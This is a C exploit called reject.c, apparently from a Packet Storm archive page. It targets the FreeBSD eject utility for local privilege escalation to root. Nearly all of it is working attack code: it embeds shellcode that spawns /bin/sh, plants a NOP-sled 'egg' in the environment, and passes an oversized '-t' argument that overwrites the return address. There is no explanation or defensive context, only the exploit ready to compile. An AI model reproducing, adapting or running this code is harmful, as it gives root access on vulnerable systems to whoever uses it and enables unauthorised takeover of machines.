FreeBSD local root eject exploit.
3cb81eca9049f33276d079a740b85efee76c56f9266a5856257c94f1ba9436b1// reject.c - FreeBSD local root eject exploit
// vuln found by kokanin :)
// sacrine - sacrine.netric.org
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#define BUFLEN 1264
#define NOP 0x90
#define EGG 1024
char shellcode[] =
"\x55\x89\xe5\x31\xc0\x50\x50\x50\x50\x66\xb8\x37\x01\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
int main
(int c, char *v[])
{
unsigned long ret = 0xbfbfee16;
char buffer[BUFLEN];
char eitje[1024];
char *ptr;
int i = 0;
if (c > 1)
ret = ret - atol(v[1]) ;
memset(buffer,NOP,sizeof(buffer));
ptr=eitje;
for (i=0; i<1024-strlen(shellcode)-1;i++)*(ptr++) = '\x90';
for (i=0; i<strlen(shellcode);i++)*(ptr++) = shellcode[i];
eitje[1024-1] = '\0';
memcpy(eitje,"EGG=",4);
putenv(eitje);
memset(buffer, 0x41, sizeof(buffer));
buffer[BUFLEN-5] = (ret & 0x000000ff);
buffer[BUFLEN-4] = (ret & 0x0000ff00) >> 8;
buffer[BUFLEN-3] = (ret & 0x00ff0000) >> 16;
buffer[BUFLEN-2] = (ret & 0xff000000) >> 24;
buffer[BUFLEN-1] = 0x00;
fprintf(stdout,"[reject.c - local root eject exploit]\n\n"
" ret: 0x%x\n"
" buf: %d\n\n",ret,strlen(buffer));
if (execl("/usr/local/sbin/eject","reject","-t", buffer, NULL) ==-1)
{
perror("execl()");
exit(EXIT_FAILURE);
}
return(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed